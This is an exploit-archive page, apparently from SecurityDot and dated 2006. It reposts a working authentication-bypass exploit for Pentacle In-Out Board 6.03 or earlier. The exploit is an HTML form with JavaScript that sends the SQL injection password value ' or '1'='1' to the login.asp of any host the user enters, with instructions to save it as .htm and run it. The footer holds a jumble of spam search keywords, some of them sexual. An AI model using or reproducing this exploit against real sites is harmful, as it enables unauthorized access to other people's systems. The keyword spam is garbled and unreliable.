about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Pentacle In-Out Board <= 6.03 (login.asp) Remote Auth Bypass



2006-02-25 Pentacle In-Out Board <= 6.03 (login.asp) Remote Auth Bypass
Rated as : Critical

<html>
<title>Pentacle In-Out Board <= 6.03 (login.asp) Authencation
ByPass Vulnerability</title>
<script language=javascript>
function ptxpl(){
if(document.xpl.victim.value=="") {
  alert("Please enter site!");
  return false;
  }
if(confirm("Are you sure?")) {
 
	xpl.action="http://"+document.xpl.victim.value+"/login.asp";
                xpl.username.value=document.xpl.username.value;
  	xpl.userpassword.value=document.xpl.userpassword.value;
                xpl.submit();
   }
}
</script>
<strong>
<font face="Tahoma" size="2">
Fill in the blank !:D<br>
Just enter host/path/ not http://host/path/!<br>
If Pentacle installed on / just enter host<br>
Example: host.com<br>
Example2: host.com/ptdir/<br>
<form name="xpl" method="POST"
action="http://pentacle.g2soft.net/login.asp"
onsubmit=ptxpl();>
Target -> <input type="text" name="victim"
value="pentacle.g2soft.net" size="50">
<input type="hidden" name="username"
value="any">
<input type="hidden" name="userpassword"
value="' or '1'='1">
<input type="submit" value="Send">
</table></form>
</html>

Save this code as .htm and then execute.
securitydot.net - 2006-02-25

Advertising

Copyright 2007, SecurityDot
Wed, 03 Dec 2008 09:18:41 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
t975t Www 89sex bigblackbu vuln/explo free sex p Www+sex+vi t903t vBulletin, Tagger LE Xxx folder imail 8 BOOLYWOOD- Www sex co nude trish PHPMyphoru mambo/inde shahvat sa t352t 200 /compo www.sex.kl SIX VIDIO Womansexe t881t redhat ent Www Nayant sexymadura Beyonce Internet e cart sql News Searc Bluefilm.c Internet e Www fuckin vidios sex www.lalats Www.india. Udayanthi. t984t t984t Bluefilm.c php guestb perl expol Www vedu s t370t sexygirals t821t search; sexygirals 200 /compo exploits f